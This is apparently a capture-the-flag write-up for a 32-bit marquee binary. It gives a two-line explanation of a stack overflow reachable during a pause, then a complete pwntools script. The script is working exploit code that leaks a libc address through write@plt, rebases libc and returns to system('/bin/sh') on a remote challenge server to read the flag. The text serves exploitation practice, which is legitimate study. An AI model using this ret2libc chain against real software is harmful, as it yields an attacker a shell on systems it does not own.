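A simple program: once it starts running, a marquee scrolls across the screen.
Decompiling it and reading the source shows that after the marquee scrolls for three rounds there is a short pause, and that pause interval can be used to carry out a stack overflow.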
from pwn import *
import time

context.log_level = 'debug'
r = remote("220.249.52.133", 51688)
# r = process("./format", shell=True)  # executes the binary locally instead
r.recvuntil(b"\n\n")
e = ELF("./format")
libc = ELF("./libc_32.so.6")
writeplt = e.symbols['write']
writegot = e.got['write']
readplt = e.symbols['read']
readgot = e.got['read']
main = e.symbols['gee']  # function to return to after the leak
# Stage 1: write(1, read@got, 4), then return to gee
payload1 = b"a" * 140 + p32(writeplt) + p32(main) + p32(1) + p32(readgot) + p32(4)
r.sendline(payload1)  # feeds the exploit to the binary
a = unpack(r.recv(4))  # gets the four bytes we leaked from the GOT
print(hex(a))
libc_base = a - libc.symbols['read']
success('libcbase:' + hex(libc_base))
libc.address = libc_base  # rebase so later symbol lookups are absolute
system_address = libc.symbols['system']
binsh_address = next(libc.search(b'/bin/sh'))
# Stage 2: system("/bin/sh") with a dummy return address
r.sendline(b"a" * 140 + pack(system_address) + b"bbbb" + pack(binsh_address))
r.sendline(b"cat flag")
r.recvuntil(b"}\n")
r.close()